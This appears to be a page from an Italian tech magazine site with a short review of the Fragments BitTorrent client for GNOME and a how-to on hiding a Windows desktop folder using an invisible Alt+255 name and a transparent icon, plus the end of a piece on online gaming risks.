L’esposizione mediatica non fa altro che aggravare la posizione delle vittime, per l’appunto. Giocare online, da questo punto di vista, può portare a relazionarsi in maniera aperta, talvolta con persone sconosciute, di cui si sa poco o nulla. Dietro queste presenze virtuali può nascondersi sempre qualche presenza oscura, pronta a colpire quando meno lo si aspetti.
Foto di Aidan Howe da Pixabay
Articoli
I migliori Open Source: Fragments
Un client BitTorrent che offre una gestione dei torrent semplice ma efficiente e utilizza il backend di Transmission
Nel panorama in continua evoluzione delle app di condivisione file, gli utenti GNOME hanno a disposizione Fragments, un client BitTorrent moderno progettato specificamente per il loro ambiente desktop. L’applicazione offre una gestione dei torrent semplice e intuitiva, integrandosi perfettamente con il design e l’estetica di GNOME grazie all’uso di GTK4 e libadwaita. Nonostante l’approccio minimalista, Fragments offre tutte le funzionalità essenziali come il controllo delle velocità di download, la gestione delle connessioni peer e le impostazioni di crittografia, sfruttando il robusto daemon di Transmission come backend.
Una sua caratteristica distintiva è la possibilità di controllare da remoto sia le proprie sessioni sia quelle di Transmission su altri dispositivi. L’interfaccia pulita permette di visualizzare una panoramica dei torrent, programmare l’ordine dei download e gestire i singoli file all’interno di un torrent. Una sezione delle statistiche completa fornisce informazioni in tempo reale sulle velocità di rete, sullo stato dei torrent e sui dati di utilizzo. Si può anche avere una panoramica di tutti i torrent raggruppati per stato. Il client supporta, infine, la cancellazione automatica dei file .torrent dopo l’aggiunta al client e il rilevamento intelligente della rete, che interrompe i download quando viene rilevata una connessione a consumo. Fragments è facilmente installabile tramite Flathub, garantendo compatibilità con diverse distribuzioni. Sebbene manchi di alcune funzionalità avanzate presenti in altri prodotti, come la limitazione della larghezza di banda, Fragments si distingue per la sua semplicità e integrazione profonda con GNOME, rendendolo ideale per chi cerca un client torrent leggero, pratico e user-friendly.
Puoi scaricare il cient da questo link.
Leggi anche: “I migliori software Open Source: Haruna:”
Articoli
Nascondi i tuoi file da occhi indiscreti
Se il tuo computer è condiviso con altre persone, allora vale la pena creare una cartella nascosta dove conservare file e documenti importanti. Vediamo come fare in Windows
Il PC di casa è un po’ la nostra stanza dei segreti: un posto in cui mettiamo i documenti importanti ma anche le cose private e intime che vogliamo tenere lontane da persone curiose. Purtroppo, soprattutto se la famiglia è numerosa e non ci sono soldi per acquistare più computer, la nostra stanza segreta diventa una stanza “condivisa”. E allora addio privacy e possibilità di avere uno spazio tutto per noi.
Ma come sempre: mai dire mai!
Se stai cercando un metodo veloce per nascondere appunti, foto e documenti importanti su Windows, abbiamo la soluzione che fa al caso tuo! L’aiuto questa volta ci arriva dai caratteri invisibili, con i quali puoi creare cartelle nascoste senza installare alcun software aggiuntivo. Si tratta di una soluzione ingegnosa per mantenere privati i nostri file sensibili. La tecnica che andremo a descrivere sfrutta i caratteri ASCII invisibili. Il codice ASCII (American Standard Code for Information Interchange) è uno standard per la codifica di caratteri testuali in computer e dispositivi di comunicazione. Include lettere, numeri, simboli e alcuni caratteri di controllo. Tra questi, alcuni sono “invisibili” perché non producono un simbolo visibile quando digitati, come lo spazio (Alt+0160), che non lascia traccia visibile nel nome della cartella. Utilizzando questi caratteri nel nome di una cartella, possiamo renderla praticamente invisibile agli occhi degli utenti comuni. Nei passi seguenti vedremo come fare.
Creiamo una cartella
Per iniziare, posizioniamo il puntatore del mouse in un punto vuoto del desktop di Windows 10. Clicchiamo con il tasto destro e dal menu contestuale che verrà aperto, spostiamo il puntatore del mouse sulla voce Nuovo e dalla schermata successiva scegliamo la voce Cartella.
Digitiamo il numero magico
Adesso, anziché dare un nome alla nuova cartella, eliminiamo la scritta presente e sempre rimanendo all’interno del campo rinomina, teniamo premuto il tasto Alt e digitiamo il numero 255 con il tastierino numerico della tastiera (quello quadrato a destra). Al termine premiamo Invio.
Icona, ma trasparente
Clicchiamo con il tasto destro del mouse sulla cartella e poi su Proprietà. Scegliamo Personalizza e poi Cambia icona. Individuiamo l’icona trasparente e selezioniamola. Clicchiamo su OK per confermare la scelta. A questo punto la cartella sarà invisibile sul desktop!
Leggi anche: “Scritte ASCII in un secondo”
*illustrazione articolo progettata da Freepik
-
News3 anni ago
Hacker Journal 280
-
News7 anni ago
Abbonati ad Hacker Journal!
-
Articoli2 anni ago
Parrot Security OS: Linux all’italiana- La distro superblindata
-
Articoli3 anni ago
Guida: Come accedere al Dark Web in modo Anonimo
-
Articoli6 anni ago
Superare i firewall
-
News5 anni ago
Le migliori Hacker Girl di tutto il mondo
-
Articoli5 anni ago
Come Scoprire password Wi-Fi con il nuovo attacco su WPA / WPA2
-
News7 anni ago
Accademia Hacker Journal